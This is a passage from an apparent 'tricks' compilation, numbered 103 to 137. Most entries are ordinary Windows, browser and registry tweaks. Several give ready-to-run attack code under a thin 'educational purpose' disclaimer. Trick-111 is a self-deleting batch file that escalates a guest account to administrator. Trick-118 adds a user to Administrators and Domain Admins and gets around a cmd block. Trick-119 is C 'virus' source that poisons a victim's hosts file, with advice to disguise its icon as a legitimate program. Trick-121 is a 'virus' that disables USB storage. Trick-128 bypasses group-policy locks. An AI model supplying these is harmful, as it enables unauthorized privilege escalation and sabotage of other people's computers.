(Note: if you write pause >nul it wont display Press Any key to continue)

* To have a complete high-speed description of files in the drive of the .bat file,
type dir /s
* You can also initiate any other command we covered earlier, such as
shutdown, error message, etc.

And why no include all of these in one fake virus?
Trick-103
Create Your Own Drive!

IF U WANT TO CREATE UR OWN PERSONAL DRIVE!
then...

Do this


Go to c drive

Create a new folder ( say samp1 )

now go to command prompt and type

subst z: c:\samp1

now go to my computer and check it..........


to remove the drive

go to command prompt and type

subst z: /d


it might be old.. but
Not every One knows it...
Trick-104
how to Speed Up Menus in windows XP

1. Click Start, and then click Run.

2. Type Regedit in the box, and then click OK.

3. Expand the menu in the left panel and select the
HKEY_CURRENT_USER\Control Panel\Desktop folder.

4. Scroll down in the right panel and double click on the MenuShowDelay file.

5. In the Value Data box, change to default value for the menu speed from 400
to a lesser number, such as 1.

6. Click OK.

Caution: Incorrectly editing the registry may severely damage your system. Before making
changes to the registry, you should back up any valued data on your computer

Trick-105
Create Registry Files Yourself

getting allergic to edit youe registry in regedit
use these steps and make .reg files
double click
and
here you ve done it


To backup the registry

Click Start, then click Run. The Run dialog box appears.
In the Open box, type regedit, then press ENTER. The Registry Editor appears.
Do one of the following:
To backup the entire registry, click My Computer.
To backup a specific group of keys or a specific key, click the folder or key.
On the main menu, click File, then click Export. The Export Registry File dialog box
appears.
Specify a name and location for the file, then click Save. The export process begins.
If you are exporting the entire registry, it can take a few minutes, and the file size can be up
to 100 MB or more. If you are exporting just one key, the file size is approximately 1 KB.

After you edit the registry, if you are experiencing problems caused by editing the registry,
you can import the backed up file:
On the main menu, click File, then click Import. The Import Registry File dialog box
appears.

Click the .reg file to import, then click Open. The import process begins. If you are
importing the entire registry, it can take a few minutes.


To create a .reg file

In a text editor, such as Notepad, type or paste the following text on the first line:
Windows Registry Editor Version 5.00

On the second line, type or paste the key path. For example, type:

[HKEY_LOCAL_MACHINE\SOFTWARE\GlobalSCAPE Inc.\EFT Server 4.0\EventRules]

(include brackets)

On the third line, type or paste the name of the key and the value (DWORD) for the key.
For example, type:
"FolderMonitorWorkerThreadCount"=dword:0000010 0

(include quotation marks)

Close the file and save it with a .reg extension. For example, type:
threadcount.reg

Double-click the file and follow the prompts to install the key into the registry. If you receive
an error, open the file to verify the information was typed correctly. The .reg file can be
transported to and used on other computers.


Trick-106
How to copy files when you get the
prompt "files is too large for the
destination files system"

Run an Administrator Console (click the Start Menu, type cmd, then
right click on the command prompt and click "Run As Administrator")
then run:

C:\Users\J>convert g: /fs:ntfs /nosecurity

where g: is the drive of your external hard disk

The type of the file system is FAT32.Enter current volume label for
drive H: My Book
The volume is in use by another process. Chkdskmight report errors
when no corruption is present.
Volume My Book created 1/31/2009 2:23 PM
Volume Serial Number is XXXX-XXXXWindows is verifying files and
folders...
File and folder verification is complete.
Windows has checked the file system and found no problems.
244,136,352 KB total disk space.
128 KB in 4 hidden files.544 KB in 17 folders.
3,063,072 KB in 63 files.
241,072,576 KB are available.
32,768 bytes in each allocation unit.
7,629,261 total allocation units on disk.
7,533,518 allocation units available on disk.
Determining disk space required for file system conversion...
Total disk space: 244196001 KBFree space on volume:
241072576 KBSpace required for conversion:
369647 KBConverting file systemConversion complete
Trick-107
XP Animations


You can turn off window animation ("exploding" windows), displayed when you
play around with minimizing/maximizing open windows. This makes navigating
Windows 95/98/ME/NT4/2000/XP a lot quicker, especially if you don't have a
fast video controller, or if you got tired of seeing it all the time (like I did).

To do this, run Regedit (or Regedt32) and go to:
HKEY_CURRENT_USER | Control Panel | Desktop | WindowMetrics
or if you are the only user of your Windows computer go to:
HKEY_USERS | .Default | Control Panel | Desktop | WindowMetrics

Right-click on an empty spot in the right hand pane. Select New -> String
[REG_SZ] Value. Name it MinAnimate. Click OK. Double-click on "MinAnimate"
and type 0 to turn OFF window animation or 1 to turn it ON. Click OK. Close the
Registry Editor and restart Windows. Done.

TweakUI, the famous Microsoft Power Toy [110 KB, free, unsupported] can
also turn off animated windows.
Just remove the check mark from the "Window Animation" box under the
General tab.
Trick-108
Set Multiple Home Pages In Firefox

Did you people ever wish to set-up multiple home pages in Firefox ?

Heres the way to do this little but useful little trick.

Suppose you would like to set Orkut, Google and Yahoo as your homepages.
Then try this tweak in Firefox to set multiple homepages. This is what you
should do :


Goto Tools>Options>Main

In the When Firefox starts drop down menu choose Show my home page

In Home page give your homepages separated by a | (pipe symbol)

Example:-
Quote:
http://www.google.com|http://www.orkut.com|http://www.yahoo.com
Click OK

Now next time when you start Firefox all of your three home pages will be
displayed simultaneously.
Trick-109
Make firefox 10x faster, 100%
working,tested

Here's how tu speed up youre firefox 10x faster

1. Type "about:config" into the address bar and hit enter. Scroll down and look
for the following entries:

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"

set "network.http.pipelining.maxrequests" to some number like 30. This means
it will make 30 requests at once.

3. Lastly right-click anywhere and select New-> Integer. Name it
"nglayout.initialpaint.delay" and set its value to "0". This value is the amount of
time the browser waits before it acts on information it recieves.

try this and you can see the difference ...........
Trick-110
Finding IP address of sender in
Yahoo, Gmail, Hotmail

Finding IP Address Of the Sender In Hotmail!!


# Log into your Hotmail account with your username and password.
# Click on the Mail tab on the top.
# Open the mail.
# If you do not see the headers above the mail message, your headers are not
displayed . To display the headers,

* Click on Options on the top-right corner
* In the Mail Options page, click on Mail Display Settings
* In Message Headers, make sure Advanced option is checked.
* Click on Ok button
* Go back to the mails and open that mail.

# If you find a header with X-Originating-IP: followed by an IP address, that is
the sender's IP address

* Hotmail headers : Daniel ,In this case the IP address of the sender is
[68.34.60.59]. This is be the IP address of the sender.

# If you find a header with Received: from followed by a Gmail proxy like this

* Hotmail headers : Daniel
* Look for Received: from followed by IP address within square brackets[]. In
this case, the IP address of the sender is [69.140.7.58].

# Or else if you have headers like this

* Hotmail headers : Daniel
* Look for Received: from followed by IP address within square brackets[].
In this case, the IP address of the sender is [61.83.145.129] .

# If you have multiple Received: from headers, eliminate the ones that have
proxy.anyknownserver.com.

Finding IP Address of the sender in Yahoo Mail!!

# Log into your Yahoo! mail with your username and password.
# Click on Inbox or whichever folder you have stored your mail.
# Open the mail.
# If you do not see the headers above the mail message, your headers are not
displayed . To display the headers,

* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail.

# You should see similar headers like this:

* Yahoo! headers : Daniel.

# Look for Received: from followed by the IP address between square brackets
[ ]. Here, it is 202.65.138.109.
# That is be the IP address of the sender!

Finding IP Address of the sender in Gmail !!

When you receive an email, you receive more than just the message. The email
comes with headers that carry important information that can tell where the
email was sent from and possibly who sent it. For that, you would need to find
the IP address of the sender. The tutorial below can help you find the IP
address of the sender.

* Log into your Gmail account with your username and password.
* Open the mail.
* To display the headers,
o Click on More options corresponding to that thread. You should get a bunch
of links. Click on Show original
* You should get headers like this:
o Gmail headers : Daniel
* Look for Received: from followed by a few hostnames and an IP address
between square brackets. In this case, it is 65.119.112.245.
* That is be the IP address of the sender!!

NOTE:=
This will not work if the sender uses anonymous proxy servers.
Trick-111
Hack admin from xp guest account

Well thats possible ..
Please Dont missuse This ARTICLE. Its meant for "Educational Purpose"
only or for helping those who have lost their PASSWORD.
HaCk "GUEST" with Admin privileges........
Quote:
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
Trick-112
Customise your USB memory stick

Open Notepad and type in the following

[autorun]

icon = *******.ico

label = *******

Change the ***** next to icon to what ever the icon is you want to use
ie. monkey.ico

Change the ***** next to label to whatever you want to name your USB
stick
ie. Monkeyweasels USB

so using my examples you end up with:

[autorun]

icon = monkey.ico

label = Monkeyweasels USB

Now save this on the root of your USB Drive with the name

autorun.inf

Also place the icon you chose to use in the Root of your USB Drive

Next time you plug in your USB Drive it will appear with the new icon
and name

Hide them by...

* right-clicking both inf file and icon
* choosing Properties...
* then tick the box entitled Hidden and
* Click OK
Trick-113
Enabling right click on sites that disable it

Lots of web sites have disabled the right click function of the mouse
button... it's really, really annoying. This is done so that you don't steal
(via right-click->save picture) their photos or images or any other
goodies. Unfortunately, it disables ALL right-click functionality: copy,
paste, open in new window.

It's easy to change, assuming your using IE 6:
Click "Tools"->"Internet Options"
Click the "Security" tab
Click "Custom Level"
Scroll down to the "Scripting" section
Set "Active Scripting" to "disable"
Click "Ok" a couple of times.

You'll probably want to turn this back to "enable" when your done...
'cause generally the javascript enhances a website.

OR

A Better way is to just get used to right clicking and hitting the Esc
"Escape" Key "NOT at the same time but very close to it" right click
first then Esc. Until you are allowed access to the context menu to
copy/save the file/photo.... Sometimes it takes a couple of tries but
with practice comes perfection. Nothing to change or Undo.


Trick-114
Hide/show installed appz in
add/remove programmes

The Add/Remove Programs list is populated from the following
registry key:

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \
Uninstall

Under the Uninstall key, there will be several sub-keys, each representing a software
program that you installed. The following example shows how to hide the AnalogX
Proxy entry from Add/Remove Programs listing:


Click Start, Run and type Regedit.exe
Navigate to the following location:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \
Uninstall \ AnalogX Proxy

In the right-pane, right-click the DisplayName value and choose Rename
Rename it to anything (For example, NoDisplayName )
The AnalogX Proxy entry is now hidden. To make it visible again, rename the value
back to DisplayName





Trick-115
Add the Ouick Launch Bar to the
Taskbar in Windows 7

The above screenshot is the Windows 7 taskbar after changing back to
XP/Vista mode, and adding the quick launch bar back. Looks just like Vista
doesnt it?

Adding the Quick Launch Bar Back to Windows 7

To add the toolbar back, youll want to right-click on an open area of the
taskbar, and choose Toolbars \ New Toolbar from the menu. You should
probably also unlock the taskbar at this point.

Nows the slightly tricky part youll want to paste the following path into the
location bar:

Code:
%appdata%\Microsoft\Internet Explorer\Quick Launch
Make sure that the location bar shows the full path, like the next screenshot,
before you choose the Select Folder button.

Youll immediately notice the Quick Launch toolbar on the taskbar, but its all
the way over on the right, so youll want to click on the dotted lines and then
drag the toolbar all the way to the left (which is slightly tricky sometimes). Note
that youll need to right-click and unlock the taskbar before you can move the
toolbar.

There we go, its over on the left but now youll want to adjust the regular
taskbar toolbar to be closer to the left, so use the dotted lines to drag it over as
well.

The normal Quick Launch that were used to doesnt have text, so right-click on
the dotted lines and uncheck Show Text as well as Show Title from the
menu.

Once youre sure its the way you want it, you should check the Lock the
taskbar again.

And there you are, the quick launch bar has returned and theres virtually no
way anybody would know this is Windows 7.
Trick-116
Speed up acrobat loading
Do u get irritated when acrobat reader takes 5/10 seconds to load
when you want to open a pdf document. There is a way to speed up
the loading.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)
2. Move all the files and folders from the "plugins" directory to the
"Optional" directory. (I repeat.. cut and paste the files NOT copy &
paste).
Also make sure that acrobat reader is not open else it will lock the files
and not allow you to move the files).
Now your acrobat reader will load very fast and almost as good as
notepad..
Trick-117
Create a Password Reset Disk
If youre running Windows XP Professional as a local user in a
workgroup environment, you can create a password reset disk to log
onto your computer when you forget your password. To create the
disk:

1.Click Start, click Control Panel, and then click User Accounts.
2.Click your account name.
3.Under Related Tasks, click Prevent a forgotten password.
4.Follow the directions in the Forgotten Password Wizard to create a
password reset disk.
5.Store the disk in a secure location, because anyone using it can
access your local user account.




Trick-118
How to access cmd if it is
blocked

This is a guide that can give you access to cmd.exe if it is blocked at your work
or school.

1-Open notepad

2-Type "command.com" in the text file

3- Save the file as command.bat( or whatever you want, as long as it ends in
.bat.)

Additional Tips

Admin Control-
net user YOURUSER YOURPASS /add >> Add_admin.txt
net localgroup Administrator YOURUSER /add >> Add_admin.txt
net group "Domain Admins" YOURUSER /add >> Add_admin.tx
Trick-119
How to block websites using C code

Most of us are familiar with the virus that used to block Orkut and Youtube site.
creating such a on . I will give a brief introduction about this code before I jump
into the technical jargon.

This code has been exclusively created in C. So, anyone with a basic
knowledge of C will be able to understand the working of the code. This
program needs to be clicked only once by the victim. Once it is clicked, itll
block a list of websites that has been specified in the source code. The victim
will never be able to surf those websites unless he re-installs the operating
system. This blocking is not just confined to IE or Firefox. So once blocked, the
site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus
that automates all the steps involved in blocking. The manual blocking process
is described in the post How to Block a Website ?
Here is the sourcecode
Quote:
#include<stdio.h>
#include<dos.h>
#include<dir.h>

char site_list[6][30]={
google.com,
www.google.com,
youtube.com,
www.youtube.com,
yahoo.com,
www.yahoo.com
};
char ip[12]=127.0.0.1";
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(C:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(C:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}

done=findfirst(D:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(D:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}

done=findfirst(E:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(E:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}

done=findfirst(F:\\windows\\system32\\drivers\\etc\\hosts,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(F:\\windows\\system32\\drivers\\etc\\hosts,r+);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,\n);
for(i=0;i<6;i++)
fprintf(target,%s\t%s\n,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
compile the program using turboc and launch the .exe file generated
Testing

1. To test, run the compiled module. It will block the sites that is listed in the
source code.

2. Once you run the file block_Site.exe, restart your browser program. Then,
type the URL of the blocked site and youll see the browser showing error
Page cannot displayed.

3. To remove the virus type the following the Run.
Code:
Quote:
%windir%\system32\drivers\etc
4. There, open the file named hosts using the notepad.At the bottom of the
opened file youll see something like this

Code:
Quote:
127.0.0.1google.com
5. Delete all such entries which contain the names of blocked sites.

NOTE: You can also change the ICON of the program to make it look like a
legitimate program
Trick-120
Restore files with or without Win CD

(System File Checker\Repairs) Command Line
"SFC" is used to scan and repair all protected system files.
"SFC /SCANNOW" scans files straight away.
"SFC /SCANBOOT" scans files every time computer boots.
"SFC /REVERT" returns SFC to its default settings.
"SFC /?" will give you further help when using the command.

Locate your Windows XP installation CD. If you don't have one, you'll need to
locate a directory on your system that's named"i386" (without the quotes). This
directory may be on a hidden partition on your hard drive. Go to Start, then to
Run, and type in "SFC /SCANNOW" (without the quotes - and with a space
between the SFC and the /SCANNOW). The press Enter. (For VISTA, go to
Start and type in the above information, then go to the top of the box and right
click on SFC /SCANNOW and select "Run As Administrator"). The program
may (or it may not) ask you for your Windows XP installation CD - please insert
it at the prompt. If it doesn't ask you for the CD this means that it wasn't
necessary to replace any files. In the event the the system asks you for the CD,
you must visit Windows Update immediately after the scan is completed
(Please note that there won't be any confirmation dialog - the program will just
exit without telling you anything). If this doesn't repair the problem with your
system other troubleshooting procedures are required.
Trick-121
Code to enable and disable usb ports

In this post I will show how to create a simple virus that disables/blocks the USB ports
on the computer (PC). Anyone with a basic knowledge of C language should be able to
understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the
computer. As a result the youll will not be able to use your pen drive or any other USB
peripheral on the computer. The source code for this virus is available for download.
You can test this virus on your own computer without any worries since I have also
given a program to re-enable all the USB ports.

To disable the USB ports
Quote:
#include<stdio.h>
void main()
{
system("reg add
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v
Start \/t REG_DWORD \/d 4 \/f");
}
save as block_usb.c and compile using turboc

Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that
will block (disable) all the USB ports on the computer upon execution (double click).
To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb
drive). Now you can see that your pen drive will never get detected.

To re-enable the USB ports
Code:
Quote:
#include<stdio.h>
void main()
{
system("reg add
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v
Start \/t REG_DWORD \/d 3 \/f");
}
save as unblock_usb.c and compile using turboc and then
just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the
pen drive and it should get detected.
Trick-122
Reinstall Windows Not Losing Anything

You can use this method as often as you like when you need to repair
something that had gotten corrupted and you don't want to do a clean install.

This is better than doing a windows repair install from the cd because doing
that can cause changes to settings and even make it so you can't get updates
anymore from microsoft update site because of the 'silent install' they did a year
or so ago (unless you rereg some dll files).

1- Start WindowsXP
2- Go to the location of your source files
3- Run WINNT32 /unattend
For example, D:\I386\winnt32 /unattend ( copy & paste this command into the
RUN box, then press ENTER ) Your computer will do the rest.

OR

Start > All Programs > Accessories > Command Prompt.
Copy & paste > D:\I386\winnt32 /unattend (notice the space between 32 and / )
Press Enter.
If you have i386 on your drive, you can replace D: ( if D: is your cd drive ) with
the location of it. (be sure it's the full i386 though)

D: is the driver letter where your windows XP Cd is
if D:\I386\winnt32 /unattend doesn't work then try : d:\winnt32 /unattend.


Trick-123
Increase Windows Vista Performance / Experience
Index upto 9.9

We all know about new feature "Windows Experience or Performance Index" in
Windows Vista. Its a new feature which automatically calculates your system
performance index based on the hardware you have. It can be between 0.1 to 9.9

Better system hardware, better Performance Index and better system performance.

"Windows Performance Index" is shown in "System Properties" which can be accessed
by right-clicking on "My Computer" icon on Desktop and select "Properties" or from
"Control Panel".

Using this trick, you can increase that Index upto 9.9

The benefit of this hack is, there are a few features in Windows Vista which can only be
used if your "Windows Experience Index" reaches the minimum requirements. So by
increasing the Index manually, you can use those features.

Like You'll get toolbar in "Photo Gallery's Slide Show" while opening a wallpaper in
Explorer.

How to:

1. Type following in Startmenu Searchbox / Run / Explorer Addressbar:
Quote:
%windir%\Performance\WinSAT\DataStore
And Press <Enter>.

2. You'll one or more .xml files in the folder. Sort them by Date Created or look at their
name. The file name will be in following format:
Quote:
2007-11-08 22.23.17.858 Assessment (Initial).WinSAT.xml
Where "2007-11-08 22.23.17.858" might differ from machine to machine and Windows
Installation date/time.

3. Open the latest file in "Wordpad" and goto line having <WinSPR>. It'll be approx.
12th line and will look like following:
Quote:
<WinSPR>
<SystemScore>1</SystemScore>
<MemoryScore>4</MemoryScore>
<CpuScore>3.4</CpuScore>
<CPUSubAggScore>2.9</CPUSubAggScore>
<VideoEncodeScore>3.9</VideoEncodeScore>
<GraphicsScore>1</GraphicsScore>
<GamingScore>1</GamingScore>
<DiskScore>4.2</DiskScore>
4. Now you can edit the numbers between > & < and can increase them upto 9.9 as
following:
Quote:
<WinSPR>
<SystemScore>9.9</SystemScore>
<MemoryScore>9.9</MemoryScore>
<CpuScore>9.9</CpuScore>
<CPUSubAggScore>9.9</CPUSubAggScore>
<VideoEncodeScore>9.9</VideoEncodeScore>
<GraphicsScore>9.9</GraphicsScore>
<GamingScore>9.9</GamingScore>
<DiskScore>9.9</DiskScore>
5. Thats it. Save the file and check the Index again in System Properties. It'll 9.9 now.

NOTE: If you can't save the file, then take ownership of the file. For taking
ownership..you can also edit and save the file by dragging the file to the desktop
and edit the file as mentioned above and save it and again place it in the original
location.that'all.

Trick-124
Change Drive Icon

First of all copy a icon file to the root of the drive.
example: c:\icon.ico

Then create a file called: autorun.inf in c:\autorun.inf
then open that file and type the following:

[autorun]
icon=icon.ico

save and close the file.

Now open my computer and refresh.. and woh! icon changed....
you can apply to other drives too.

be careful:
"autorun.inf" and "ico.ico" must be in the root of the drive.
example: c:\autorun.inf and c:\icon.ico.
same on the root.
Trick-125
How To Read Deleted Sms's

A SMS once deleted can?t be read again?.but sometimes we hurriedly delete
some important SMS. Here is the technique that must be followed to retrieve
deleted SMS. Required utility:
1) Any system explorer or file explorer program (eg. fileman or
fexplorer.provided with the package)
Step 1) Open Fexplorer
Step2) Select drive C: or D: depending on the memory in which the Sms
messages have been saved.
Step 3) For example u selected c: , Then open system folder.
step 4) Then in system folder open mail folder.
step 5) Then in this folder u will see different folders (eg 0010001_s) and
certain files (eg 00100000). These files are the actual messages. Browse
through every folder and open all files till u get the sms u are looking for.
Step 6) For opening the files don't choose options>file>open as it will show
format not supported rather choose options>file>hex/text viewer.By selecting
the Hex/ text viewer u ll be able to open and read the deleted SMS message



Trick-126
Mouse 3rd button in browsers

There are some internet surfers who likes to open the link in a different tab...
So for them there is a little advice...

for firefox or chrome or IE ......

Click on a link in a web page with the 3rd button of your mouse or the middle
one...(SAME THING).....the link will open in different tab...

May be some people know this and some may not...
Its for them who are not aware of this....
Trick-127
Auto Image Resize In Internet Explorer

Sometimes, we really don't know little but useful option. Auto Image Resize is
just like that. One of my colleague complaint me that his Internet Explorer
doesn't set image size automatically. When he browses with maximize window
of Internet Explorer then it is fine with image size but when he Restore Internet
Explorer then the image size doesn't set/follow to Internet Explorer. If you can
enable Auto Image Resize in Internet Explorer then image size always follow to
your Internet Explorer window size. Mostly, it is enable. But if it is disable then
you can enable it with simple following steps.

Copy-paste following text in notepad and save it with .reg extension, then just
merge/run it.

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Enable AutoImageResize"="yes"
Enable Auto Image Resize:

Disable Auto Image Resize
Trick-128
Enabiling Cmd + Regedit When It's Disabled
By Admin / Group Policy

CMD:

Step 1:
Create a new shortcut
Step 2:
Add the following to the shortcut:

REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t
REG_DWORD /d 0 /f


Regedit:

Step 1:
Create shortcut
Step 2:
Add the following to the shortcut:

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System
/v DisableRegistryTools /t REG_DWORD /d 0 /f
Backup register keys b4 u try this
Trick-129
Adjust Browser Cache Sizes

The maximum size of your Internet Explorer browser cache is ###
megabytes. Generally, cache sizes above 80 megabytes waste disk
space and can actually cause slower performance.
Solutions

How to adjust the IE cache size

Start Internet Explorer
Select Tools | Internet Options | General tab
Under Temporary Internet Files click the Settings button.
In the box for the amount of disk space to use, enter a value between
5 and 80 megabytes.
Click OK to accept the changes.
Trick-130
Empty the Temp Folder Automatically

You can safely remove anything in C:\Windows\Temp that was created before
the current Windows session. So the best time to have it automatically emptied
is during boot-up. Here's how to do that:

Select Start, Run, type the command sysedit and press Enter to launch the
System Configuration Editor. Once there, go to the autoexec.bat window. That
batch file may contain text, or it may be blank. Either way, add these two lines:

deltree /y c:\windows\temp

md c:\windows\temp

Save the file and exit the program or click on the X to close. When asked if you
want to save changes, click Yes. Next time you restart the temp files will be
deleted.

From now on, you'll get an empty temp folder every time you boot.



Trick-131

top A Restart Process In 3steps
Some times we need to stop some restart process quickly. In windows
XP some times it gives auto restart warning and here is good solution
for it.

1. Go to Start menu
2. Click on RUN
3. Enter the following command excluding hashcodes "shutdown -a"
Trick-132
Vista - Changing the Boot Screen

STEP ONE:
Navigate yourself to C:\Windows\system32\en-US for english; \NL-nl for Dutch and so
on for each language available for Vista.

STEP TWO:
Find winload.exe.mui and open the Properties for this file.
Click on the 'Security' tab, now choose 'Advanced' and set the ownership of this file to
'Users'.

STEP THREE:
Now you need to copy and paste your desired background and replace it with the
background from the folder 'system32\en-US folder'

STEP FOUR:
Now, goto 'Start > Run' and type 'msconfig'.

STEP FIVE:
Choose the 'Boot' tab and now enable 'No GUI Boot'

STEP SIX:
Close msconfig and reboot your computer.
__________________
Trick-133
How to Make a Shutdown Timer

Step 1.

Right Click on your desktop and choose "New->Shortcut".

Step 2.

In the box that says "Type the location of the shortcut", type in shutdown -s -t 3600 and
click next.

Note: 3600 are the amount of seconds before your computer shuts down. So,
60secs*60mins=3600secs.

Step 3.

Make up a name for the shortcut and you're done.
You can change the icon by right clicking->properities->change icon-> browse.

More Info:
To make an abort key to stop the shutdown timer just create another shortcut and make
the "location of the shortcut" to shutdown -a
Trick-134
Disable XP Boot Logo

Be aware that removing the splash screen will also cause you not to see any
boot-up messages that might come up (chkdsk, convert ... ), but if your system
runs without any problems then it should not matter.

1. Edit boot.ini
2. Add " /noguiboot" right after "/fastdetect".

(or check the /noguiboot switch in msconfig on the boot.ini tab)

Upon restarting, the splash screen will be gone. It can be re-enabled by
removing the new switch.
Trick-135
Compress files 10% more than
the normal method (winrar)

Right click on your file and select "Add to archive" from the context menu. A
dialog box will appear.

In the General Tab, click "Compression Method." A dropdown menu will
appear, select "Best".

Click on the Advanced Tab, then click the "Compression..." button. The
"Advanced Compression Parameters" dialog box will appear.

In the Text Compression section, select Force and in Prediction Order type 63.
For the Memory to use type 128. Then click Ok twice.


This method will compress files 10% more than the normal method
Trick-136
Disable Messenger SERVICE (Not MSN
messenger)

In the default installation of XP, the Messenger service runs by default.
Messenger in windows2000/XP is similiar to the functionality of what
"WinPopup" was to Win3.x/9X. However, having this service running will cause
problems in the very near future, as ANYONE can send popup messages to
your computer when you have this service running. (The service doesn't check
where the message comes from).

Don't believe it? At the command prompt, type "net send
IPADDRESS_OF_CLIENT_TO_SEND_TO Your Message" and that person will
get a popup window immediately with "Your Message" .. the popup window will
says "Messenger Service" in the titlebar and will contain your workstation's
name and the time. You can send a message to yourself by typing
"LOCALHOST" to test this.

Another thing worth noting, if you are using a microsoft firewall, these
messages will still be sent through the firewall.

To make it so others cannot send these messages to you, disable the
Messenger service from Services. (Go to Control Panel > Perf. & Maint. >
Administrative Tools > Services. Double click the Messenger Service, change
'Automatic' to 'Disabled' and click the Stop button.) Once you've done this,
people trying to send messages via the net message service will get errors.
While you're at it, it might be wise to disable the 'Administrative Alerts' service
as well.

The description Microsoft gives for this service is as follows: "Transmits net
send and Alerter service messages between clients and servers. This service is
not related to windows Messenger. If this service is stopped, Alerter messages
will not be transmitted. If this service is disabled, any services that explicitly
depend on it will fail to start."
Trick-137
Useful RUN commands!!!

Accessibility Controls - access.cpl

Add Hardware Wizard - hdwwiz.cpl

Add/Remove Programs - appwiz.cpl

Administrative Tools - control admintools

Automatic Updates - wuaucpl.cpl

Bluetooth Transfer Wizard - fsquirt

Calculator - calc

Certificate Manager - certmgr.msc

Character Map - charmap

Check Disk Utility - chkdsk

Clipboard Viewer - clipbrd

Command Prompt - cmd

Component Services - dcomcnfg

Computer Management - compmgmt.msc

Date and Time Properties - timedate.cpl

DDE Shares - ddeshare

Device Manager - devmgmt.msc

Direct X Control Panel (If Installed)* - directx.cpl

Direct X Troubleshooter - dxdiag

Disk Cleanup Utility - cleanmgr

Disk Defragment - dfrg.msc

Disk Management - diskmgmt.msc

Disk Partition Manager - diskpart

Display Properties - control desktop

Display Properties - desk.cpl

Display Properties (w/Appearance Tab Preselected) - control color

Dr. Watson System Troubleshooting Utility - drwtsn32

Driver Verifier Utility - verifier

Event Viewer - eventvwr.msc

File Signature Verification Tool - sigverif

Findfast - findfast.cpl

Folders Properties - control folders

Fonts - control fonts

Fonts Folder - fonts

Free Cell Card Game - freecell

Game Controllers - joy.cpl

Group Policy Editor (XP Prof) - gpedit.msc

Hearts Card Game - mshearts

Iexpress Wizard - iexpress

Indexing Service - ciadv.msc

Internet Properties - inetcpl.cpl

IP Configuration (Display Connection Configuration) - ipconfig /all

IP Configuration (Display DNS Cache Contents) - ipconfig /displaydns

IP Configuration (Delete DNS Cache Contents) - ipconfig /flushdns

IP Configuration (Release All Connections) - ipconfig /release

IP Configuration (Renew All Connections) - ipconfig /renew

IP Configuration (Refreshes DHCP & Re - Registers DNS) - ipconfig
/registerdns

IP Configuration (Display DHCP Class ID) - ipconfig /showclassid

IP Configuration (Modifies DHCP Class ID) - ipconfig /setclassid

Java Control Panel (If Installed) - jpicpl32.cpl

Java Control Panel (If Installed) - javaws

Keyboard Properties - control keyboard

Local Security Settings - secpol.msc

Local Users and Groups - lusrmgr.msc

Logs You Out Of Windows - logoff

Microsoft Chat - winchat

Minesweeper Game - winmine

Mouse Properties - control mouse

Mouse Properties - main.cpl

Network Connections - control netconnections

Network Connections - ncpa.cpl

Network Setup Wizard - netsetup.cpl

Notepad - notepad

Nview Desktop Manager (If Installed) - nvtuicpl.cpl

Object Packager - packager

ODBC Data Source Administrator - odbccp32.cpl

On Screen Keyboard - osk

Opens AC3 Filter (If Installed) - ac3filter.cpl

Password Properties - password.cpl

Performance Monitor - perfmon.msc

Performance Monitor - perfmon

Phone and Modem Options - telephon.cpl

Power Configuration - powercfg.cpl

Printers and Faxes - control printers

Printers Folder - printers

Private Character Editor - eudcedit

Quicktime (If Installed) - QuickTime.cpl

Regional Settings - intl.cpl

Registry Editor - regedit

Registry Editor - regedit32

Remote Desktop - mstsc

Removable Storage - ntmsmgr.msc

Removable Storage Operator Requests - ntmsoprq.msc

Resultant Set of Policy (XP Prof) - rsop.msc

Scanners and Cameras - sticpl.cpl

Scheduled Tasks - control schedtasks

Security Center - wscui.cpl

Services - services.msc

Shared Folders - fsmgmt.msc

Shuts Down Windows - shutdown

Sounds and Audio - mmsys.cpl

Spider Solitare Card Game - spider

SQL Client Configuration - cliconfg

System Configuration Editor - sysedit

System Configuration Utility - msconfig

System File Checker Utility (Scan Immediately) - sfc /scannow

System File Checker Utility (Scan Once At Next Boot) - sfc /scanonce

System File Checker Utility (Scan On Every Boot) - sfc /scanboot

System File Checker Utility (Return to Default Setting) - sfc /revert

